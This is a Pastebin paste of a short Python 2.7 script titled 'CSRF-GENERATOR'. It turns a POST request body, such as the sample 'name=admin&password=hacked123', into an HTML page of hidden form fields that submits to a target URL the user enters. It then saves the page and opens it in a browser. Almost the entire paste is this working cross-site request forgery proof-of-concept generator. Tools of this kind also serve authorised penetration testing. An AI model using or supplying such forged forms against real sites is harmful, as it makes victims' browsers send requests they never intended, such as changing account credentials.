Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python2.7
- #CSRF-GENERATOR
- import time
- import os
- import urllib, webbrowser
- global in_w
- in_w = raw_input('POST reqest (e.g. name=admin&password=hacked123: ')
- def parse_request(var=False,value=False,longz=False):
- input_request = in_w
- output_request = urllib.unquote(input_request)
- req_ = output_request.split('&')
- len_req = len(req_)
- var_list = []
- value_list = []
- for word in req_:
- parse_again = word.split('=')
- var_list.append(parse_again[0])
- value_list.append(parse_again[1])
- if var:
- return var_list
- if value:
- return value_list
- if longz:
- return len_req
- def generate_csrf_poc(target_url):
- varz = parse_request(True,False,False)
- valuez = parse_request(False,True,False)
- html_payload = '<html>\n<body>\n<form action="%s" method="POST" />\n' % (target_url)
- how_much = parse_request(False,False,True)
- for i in xrange(how_much):
- html_payload += '<input type="hidden" name ="%s" value="%s"/>\n' % (varz[i],valuez[i])
- html_payload += '<input type="submit" value="csrf"/>'
- html_payload += '\n</form>\n</body>\n</html>'
- return html_payload
- def main():
- ask_for_url = raw_input('url adress: ')
- f_name = str(time.time())
- csrf_file = open(f_name+'.html','w')
- print generate_csrf_poc(ask_for_url)
- path = os.path.abspath(f_name+'.html')
- print 'csrf file:',path
- csrf_file.write(generate_csrf_poc(ask_for_url))
- csrf_file.close()
- webbrowser.open(path)
- main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement